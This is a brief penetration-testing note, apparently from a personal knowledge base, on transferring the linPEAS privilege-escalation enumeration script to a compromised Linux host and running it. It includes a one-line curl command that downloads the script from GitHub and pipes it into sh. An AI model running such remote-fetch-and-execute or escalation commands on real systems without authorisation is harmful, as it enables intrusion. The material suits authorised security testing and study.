#linPEAS #escalation #privledge get [linpeas.sh](https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh) on the system and run the #enumeration #scp if you have ssh access #http.server and #wget and [[cURL]] ```shell # From github curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh ```